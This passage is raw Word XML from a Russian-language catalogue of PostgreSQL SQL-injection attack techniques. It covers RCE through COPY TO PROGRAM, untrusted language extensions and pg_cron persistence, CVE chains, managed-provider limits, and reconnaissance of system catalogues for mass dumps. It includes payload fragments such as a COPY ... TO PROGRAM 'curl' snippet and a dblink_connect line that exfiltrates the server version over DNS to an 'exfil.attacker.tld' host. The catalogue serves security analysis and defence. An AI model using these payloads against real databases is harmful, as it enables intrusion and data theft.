        </w:rPr>
        <w:t xml:space="preserve">обвес</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> к 3.7.1/3.7.2a/3.7.3: атакующий вставляет в cron-job </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY ... TO PROGRAM 'curl …'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для persistence, либо </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE FUNCTION plpython3u + SELECT fn()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с отложенным запуском. На managed-провайдерах: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_cron</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> доступен на AWS RDS (как preview), Cloud SQL и Azure Database for PostgreSQL — но запускается под superuser (RDS —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а RCE-векторы там структурно закрыты. На self-hosted PG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_cron</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> плюс superuser — реальный путь к persistent RCE. В категории 3.7 кратко упоминается; детальная карточка — в 3.13 (privilege escalation) или в саммари 5.4 (mitigations расширений).</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R3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — COPY FROM/TO PROGRAM: PostgreSQL Docs (sql-copy, predefined-roles), Greenwolf classic, Rapid7 Metasploit module (postgres_copy_from_program_cmd_exec), CVE-2019-9193 disputed advisory.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R7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — CVE-2024-10979 + untrusted languages: PostgreSQL Project Security Advisory (CVE-2024-10979), PoC репозиторий gh-ost00/CVE-2024-10979, RedRays step-by-step reproduction guide, NIST NVD.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R6/R21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — chain CVE-2025-1094 → COPY PROGRAM: PostgreSQL advisory CVE-2025-1094, Rapid7 SecureLayer7 разбор chain, BeyondTrust BT24-12356 Metasploit module.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Общие:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> HackTricks PostgreSQL Injection (раздел RCE), PortSwigger Web Security Academy (SQLi cheat sheet PostgreSQL section), Rapid7 Metasploit Postgres modules index.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Docs расширений:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> PostgreSQL plperl (trusted/untrusted), plpython, plsh GitHub (petere/plsh), plr GitHub, plv8 GitHub.</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без получения superuser или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три из четырёх путей 3.7 недоступны. 3.13 описывает методы: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(R8) для смены роли в той же сессии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search_path hijacking + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">schema_element</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (R12) для подмены функции в admin-сессии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Extension scripts (R16) для пре-installed RCE через скомпрометированное расширение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Index expressions + autovacuum (R15) для исполнения кода под owner-роли таблицы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3.6.4 lo_export</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — file-write вектор; единственный realistic канал доставки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/x.so</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для 3.7.2b (CVE-2024-10979) внутри одной DB-сессии.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 Data-modifying CTE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — альтернатива стакингу для протаскивания DDL в инъекции, где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блокирован extended-протоколом. Может комбинироваться с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE FUNCTION ... LANGUAGE plperlu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через WITH-блок.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 Хронология 2024</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — общий контекст CVE-2024-10979 / 10978 / 10976 / 10977 (все четыре фикса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 — детали CVE-2025-1094 для chain R6 → R3 в Payload C из 3.7.1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Managed-провайдеры</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Все четыре пути RCE в managed-PostgreSQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">структурно ограничены или недоступны</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:b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Провайдер</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COPY PROGRAM</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plperlu</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CVE-2024-10979 (plperl)</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plpython3u / plsh</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AWS RDS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 (нет </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pg_execute_server_program</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rds_superuser</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> не равен superuser)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 (нет в </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">rds.extensions</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserv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опционально, патчится в minor-обновлениях</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Google Cloud SQL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plperl доступен</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, патч обычно накатан</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Supabase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plperl не доступен</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Azure Database for PG</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опционально, патчится в minor-обновлениях</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недоступно</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Реальная угроза 3.7 — для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">self-hosted PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (on-prem, EC2-VM с PG, k8s-stateful-set). В managed-окружении даже SQLi на superuser-уровне не даёт RCE — провайдер ограничивает API серверной фичи (COPY PROGRAM, untrusted extensions). Единственная остаточная угроза — CVE-2024-10979 на Cloud SQL до накатывания фикса, но эта окно обычно закрывается в течение недель после release.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Детальный разбор managed-ограничений — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.9 Managed-провайдеры: RDS, Cloud SQL, Supabase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.8.0 Обзор</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Если 3.1–3.4 — про каналы вытаскивания строк из конкретной таблицы, то </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.8 — про вытаскивание карты самой БД</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: какие схемы, какие таблицы, какие колонки, какие функции, какие роли и привилегии, какая версия PG, какие расширения установлены, какие GUC-параметры выставлены. Эта карта — пререквизит для всех остальных категорий: какие колонки выбирать в UNION (3.1), какие функции вызывать для OOB (3.6), под какие CVE подходит обнаруженная версия (4.x), к какой SECURITY DEFINER функции цепляться для эскалации (3.13).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В типичной атаке 3.8 идёт первым шагом после получения точки инъекции: атакующий не знает, как называются таблицы и колонки приложения, и системные каталоги PG — единственный надёжный источник этой информации.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Почему PostgreSQL здесь отличается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Системные каталоги стандартизованы.</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pg_catalog.pg_class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имеют одинаковую структуру от PostgreSQL 9.x до 17.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тоже есть (SQL-стандарт), но детальная карта — в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Имена и типы колонок системных каталогов известны заранее, payload-ы пишутся без предварительной разведки.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Доступ к большинству каталогов — PUBLIC.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читает любая аутентифицированная роль. SELECT на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с хешами) и view </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 — только superuser. Полная модель привилегий — см. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2</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Массовый дамп одной функцией.</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query_to_xml('SELECT * FROM t', true, false,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database_to_xml(true, false,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table_to_xml('t'::regclass, true, false, '')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> дампят запрос/таблицу/всю БД в XML за один вызов. Payload помещается в один UNION-блок без подбора количества колонок и без chunked-эксфильтрации.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Утечка через статистику.</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 view с агрегатами планировщика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histogram_bounds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Из-за </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2024-4317</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (до 16.3/15.7/14.12) и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2025-8713</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (до 17.6/16.10/15.14/14.19/13.22) фрагменты данных утекают </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">без SELECT-привилегии на исходную колонку и с обходом RLS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — этого паттерна у MySQL нет вовсе.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Структура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 карта схем, таблиц, колонок.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 список функций, их сигнатуры, языки, owner-ы, тело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Пререквизит к 3.13 (SECURITY DEFINER функции для эскалации).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3.8.3</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 (требует SUPERUSER) и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(PUBLIC, но без хешей).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3.8.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fingerprinting через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current_setting('server_version_num')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current_setting('data_directory')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current_database()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — определение версии для выбора применимой цепочки CVE из раздела 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3.8.5</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table_to_xml()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — массовый дамп.</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3.8.6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Утечка через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 обход ACL/RLS через optimizer statistics (R17 CVE-2024-4317, R26 CVE-2025-8713).</w:t>
      </w:r>
    </w:p>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 vs 3.8.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.1 — про извлечение строк из пользовательских таблиц через подобранный UNION. 3.8 — про извлечение метаданных через системные каталоги. На практике связка обязательна: UNION (3.1) — это транспорт;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(3.8.1) — это контент.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 (OOB) vs 3.8.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.8 предполагает, что HTTP-ответ видим (UNION/error-based возвращает результат прямо в response). 3.6 — про невидимый канал (DNS/TCP/файлы). Метаданные ортогональны каналу: формула «3.8-payload внутри 3.6-обёртки» — это OOB-разведка карты БД (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">dblink_connect('host=' || (SELECT version()) || '.exfil.attacker.tld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 vs 3.8.3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.8.3 предполагает, что superuser уже есть — это про дамп </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_authid.rolpassword</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для оффлайн-подбора и атаки на другие системы, где переиспользованы те же пароли. 3.13 — про получение superuser-а с нуля. Связка: 3.13 → 3.8.3 как пост-эксплуатация.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3.8.6 vs 3.17 (RLS-обходы).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.8.6 — утечка через optimizer statistics, конкретный регрессионный класс CVE; в 3.17 (3.17.4) этот же вектор разбирается с точки зрения именно RLS-моделирования.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Привилегии по подразделам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 для базового payload-а</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(любая аутентифицированная роль)</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для имён/сигнатур; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">prosrc</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
